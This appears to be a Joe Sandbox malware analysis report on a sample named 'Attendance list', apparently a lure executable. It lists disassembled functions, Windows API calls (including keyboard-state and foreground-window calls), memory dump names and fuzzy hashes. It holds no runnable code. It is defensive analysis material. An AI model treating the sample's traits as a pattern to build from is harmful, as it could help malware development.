                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: 2c2131aba045d77a2b9bd6b711c3deae360783d10b392f69d2a5a43a5237ca11
                        • Instruction ID: 05554347623f2d865fd6b89cb46c53c878db582cc8215b8f0f57453235c21bb5
                        • Opcode Fuzzy Hash: 2c2131aba045d77a2b9bd6b711c3deae360783d10b392f69d2a5a43a5237ca11
                        • Instruction Fuzzy Hash: F5311771A00B0AABCF18DF2DC484A69B7B5FB48320F148629E81AD3714D771F9A0DB91
                        Function 009000D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 6aade6d75e2a2e41958e1959cf93a8a9721b8994b983c1c81e761349d809847e
                        • Instruction ID: 4124438dee0f8c73213d8310a84accb28ea78fbd6fc5ad38ae1427a89821359d
                        • Opcode Fuzzy Hash: 6aade6d75e2a2e41958e1959cf93a8a9721b8994b983c1c81e761349d809847e
                        • Instruction Fuzzy Hash: 3D41D2745087558FDB24DF18C484F1ABBE0FF85318F19889CE99A8B762C732E885CB52
                        Function 008C79AB Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                        • Instruction ID: 31a6a862b9591521e1994850ecb239514b085bb510e31c595ef442d2f3f1e1cc
                        • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                        • Instruction Fuzzy Hash: 4A11B132208215AFD714DF2CC881E6EB7B9FF45324724851EE916DB2A1DB32EC118B91
                        Function 008C4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C4D13: FreeLibrary.KERNEL32(00000000,?), ref: 008C4D4D
                          • Part of subcall function 008E548B: __wfsopen.LIBCMT ref: 008E5496
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008C4F6F
                          • Part of subcall function 008C4CC8: FreeLibrary.KERNEL32(00000000), ref: 008C4D02
                          • Part of subcall function 008C4DD0: _memmove.LIBCMT ref: 008C4E1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Library$Free$Load__wfsopen_memmove
                        • String ID:
                        • API String ID: 1396898556-0
                        • Opcode ID: 7f13fdb57b3c640983ea9942ba313915a2bbf8b7ed117a10fca37fe1c9e0e9c0
                        • Instruction ID: 86e61c54c20e9eaceae7f3785ace8c3125b55fcda74b8cd01830cf689b009422
                        • Opcode Fuzzy Hash: 7f13fdb57b3c640983ea9942ba313915a2bbf8b7ed117a10fca37fe1c9e0e9c0
                        • Instruction Fuzzy Hash: 3211E231610609AACB10BF78D822F6E72B5EB40701F10842DF942E6181DEB1DA409761
                        Function 009001AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 8de892c02e54569b7399dea5d67ebfb8d2f016f350fc11724261a8e9a83c3989
                        • Instruction ID: 5861cb23a35065fad8eef3863a406481fcba4203108d5840842f218126fa975e
                        • Opcode Fuzzy Hash: 8de892c02e54569b7399dea5d67ebfb8d2f016f350fc11724261a8e9a83c3989
                        • Instruction Fuzzy Hash: A921EE74508345DFCB28DF54C444F1ABBE0FB85708F04896CE99A97761D731E845CB92
                        Function 008C5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                        Download Yara Rule
                        APIs
                        • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,008C5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 008C5D76
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: add8a5b5b365410ab04dc4b42b7aebe32c51ccc878ca5e06c64261e8d18674fe
                        • Instruction ID: 94baaf2e5a2fda4707abb10aa5e65cec6331d65c4b4d0117e3b1412484d1b581
                        • Opcode Fuzzy Hash: add8a5b5b365410ab04dc4b42b7aebe32c51ccc878ca5e06c64261e8d18674fe
                        • Instruction Fuzzy Hash: 2E112871204B059FDB208F15C884F62B7F5FB45750F14C92EE6AB86A50D770F985CB60
                        Function 008E4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                        • __lock_file.LIBCMT ref: 008E4AD6
                          • Part of subcall function 008E8D68: __getptd_noexit.LIBCMT ref: 008E8D68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2597487223-0
                        • Opcode ID: db4de2e9ecd01cb90d3300327a9b1d3f8fcc7a83a98c04368e85aec2a3dd41a7
                        • Instruction ID: ca3b707fd67937728dcd02d690c8916dafa62d40aa8e0ead6d31a78c1ffbb254
                        • Opcode Fuzzy Hash: db4de2e9ecd01cb90d3300327a9b1d3f8fcc7a83a98c04368e85aec2a3dd41a7
                        • Instruction Fuzzy Hash: 3AF08131940299EBDB51AF6A8C0639E3661FF42335F148514B42CEA1D1DB788950DB52
                        Function 008C4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(?,?,009862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008C4FDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 21bb40ad71e0f6e84c8600943ebe383b22de5b202781002411dd9aa09ee7a4a2
                        • Instruction ID: 1d8ca5894fc4ad02e7d629686cc9e0489046c2e7f7af31614b17c067f8fa9673
                        • Opcode Fuzzy Hash: 21bb40ad71e0f6e84c8600943ebe383b22de5b202781002411dd9aa09ee7a4a2
                        • Instruction Fuzzy Hash: 04F0F271119712CFCB349F64E4A4D12BBF1FB053293209A2EE59682610CB32A884DB40
                        Function 008E09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E09F4
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: LongNamePath_memmove
                        • String ID:
                        • API String ID: 2514874351-0
                        • Opcode ID: aa5ced77d94e6d37edbe9e1d90e64f2c680250b4b6384650fb1d299f6663a549
                        • Instruction ID: d0bb5e54a2af237f72d1c1cdc5fcfb45a4f2f6b984d6b92c27a2069da75a2f35
                        • Opcode Fuzzy Hash: aa5ced77d94e6d37edbe9e1d90e64f2c680250b4b6384650fb1d299f6663a549
                        • Instruction Fuzzy Hash: 6CE086369052289BC720D66C9C05FFA77ADEF897A0F0401B5FD0CD7208D9A59C818691
                        Function 00929129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID:
                        • API String ID: 2638373210-0
                        • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                        • Instruction ID: b1077e86985307cedc475ebb02aad8d7133d2d4bc56d746d05a3351e2ff0f191
                        • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                        • Instruction Fuzzy Hash: 01E092B0118B505FD7388A24E8107E373E4FB06315F00081CF29AC3342EB6278418759
                        Function 008C5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                        Download Yara Rule
                        APIs
                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,008FE16B,?,?,00000000), ref: 008C5DBF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: 5711e57903e17e31330ca7273688b5d14fd2d76a9ba0b110e3b71cdc830282fc
                        • Instruction ID: e09cbf04d6b34d4396ceb2f167052b10de1b1ecb9a3a30fcd0e0a3cc70b7c135
                        • Opcode Fuzzy Hash: 5711e57903e17e31330ca7273688b5d14fd2d76a9ba0b110e3b71cdc830282fc
                        • Instruction Fuzzy Hash: 73D0C77465420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6B27D509795
                        Function 008E548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction ID: 0a4c8829ccfe2dd9111a9f28e6dd926ea0d1b545a9c7134b2a701d5510f25324
                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction Fuzzy Hash: 37B092B684020C77DE022E86EC02A593B19AB4167CF808020FB0C181A2A673E6A0968E
                        Function 0092D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(00000002,00000000), ref: 0092D46A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorLast
                        • String ID:
                        • API String ID: 1452528299-0
                        • Opcode ID: 2fa5093c4e00b702019072a2d1d85b6b67abd76d33fc7a3bdb3e5176e9671290
                        • Instruction ID: 2ee8ef16e920d71f89ee251c7d72f449bf545fb9aa494324642e9c3ee87c1181
                        • Opcode Fuzzy Hash: 2fa5093c4e00b702019072a2d1d85b6b67abd76d33fc7a3bdb3e5176e9671290
                        • Instruction Fuzzy Hash: CA714D302093128FCB14EF28D491F6AB7E4FF89314F04496DF4969B2A6DB74E949CB52
                        Function 008E0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: 002ca82f281eccd59c31bef11a3932d2562b94f818fa538e804073ab38aa3ecb
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 5631F370A0018ADBC718DF5AD480969F7A6FF5A300B688AA5E409CB751DBB0EDC1CFD0
                        Function 00E822A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 00E822B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 2d2a8159e631f84abaaf31b42da3f114482ce830435b2baa34a3473f6275bb5b
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 44E0E67494010EDFDB00EFB4D54969E7FB4EF04301F100165FD05E2280D6309D508A72

                        Non-executed Functions

                        Function 0094CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0094CE50
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094CE91
                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0094CED6
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0094CF00
                        • SendMessageW.USER32 ref: 0094CF29
                        • _wcsncpy.LIBCMT ref: 0094CFA1
                        • GetKeyState.USER32(00000011), ref: 0094CFC2
                        • GetKeyState.USER32(00000009), ref: 0094CFCF
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094CFE5
                        • GetKeyState.USER32(00000010), ref: 0094CFEF
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0094D018
                        • SendMessageW.USER32 ref: 0094D03F
                        • SendMessageW.USER32(?,00001030,?,0094B602), ref: 0094D145
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0094D15B
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0094D16E
                        • SetCapture.USER32(?), ref: 0094D177
                        • ClientToScreen.USER32(?,?), ref: 0094D1DC
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0094D1E9
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0094D203
                        • ReleaseCapture.USER32 ref: 0094D20E
                        • GetCursorPos.USER32(?), ref: 0094D248
                        • ScreenToClient.USER32(?,?), ref: 0094D255
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0094D2B1
                        • SendMessageW.USER32 ref: 0094D2DF
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0094D31C
                        • SendMessageW.USER32 ref: 0094D34B
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0094D36C
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0094D37B
                        • GetCursorPos.USER32(?), ref: 0094D39B
                        • ScreenToClient.USER32(?,?), ref: 0094D3A8
                        • GetParent.USER32(?), ref: 0094D3C8
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0094D431
                        • SendMessageW.USER32 ref: 0094D462
                        • ClientToScreen.USER32(?,?), ref: 0094D4C0
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0094D4F0
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0094D51A
                        • SendMessageW.USER32 ref: 0094D53D
                        • ClientToScreen.USER32(?,?), ref: 0094D58F
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0094D5C3
                          • Part of subcall function 008C25DB: GetWindowLongW.USER32(?,000000EB), ref: 008C25EC
                        • GetWindowLongW.USER32(?,000000F0), ref: 0094D65F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 3977979337-4164748364
                        • Opcode ID: 9591e3529485d9c0d501a2f81622297ee101ba01410097abd804346fe0a36ef0
                        • Instruction ID: b657e4dc35be60fe2478be5eb93dc9e2862d73f010ffc1e38958967bdc7605c4
                        • Opcode Fuzzy Hash: 9591e3529485d9c0d501a2f81622297ee101ba01410097abd804346fe0a36ef0
                        • Instruction Fuzzy Hash: C6429A7420A241AFC725CF28C858FAABBE9FF49314F14091DF699972A0C731EC54DB96
                        Function 0094804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0094873F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: %d/%02d/%02d
                        • API String ID: 3850602802-328681919
                        • Opcode ID: beb29a58666b3a330c0d37c1e19c6508625abd50d58c48c4f49ae1010a52df1b
                        • Instruction ID: 7a87752113196d44b0b4860a1bf6ca8e6c090448466b8d60722c5f49a8f5302e
                        • Opcode Fuzzy Hash: beb29a58666b3a330c0d37c1e19c6508625abd50d58c48c4f49ae1010a52df1b
                        • Instruction Fuzzy Hash: D1120E70504249ABEB258F28CC59FAF7BB8EF4A750F204569F915EA2E1DFB48941CB10
                        Function 008D710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove$_memset
                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                        • API String ID: 1357608183-1798697756
                        • Opcode ID: dba3fc7094b482e6d89874daa96c381e9f100aaf53c70966013cbeb2e0646bb3
                        • Instruction ID: 5f7a2f71e06524abec39ef8709a30e50494b9ebc71ae68dae94efd5b800a51cf
                        • Opcode Fuzzy Hash: dba3fc7094b482e6d89874daa96c381e9f100aaf53c70966013cbeb2e0646bb3
                        • Instruction Fuzzy Hash: FF937B71A0421ADBDB24DF98C881BEDB7B1FF48714F24856AE955EB380E7749E81CB40
                        Function 008C4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(00000000,?), ref: 008C4A3D
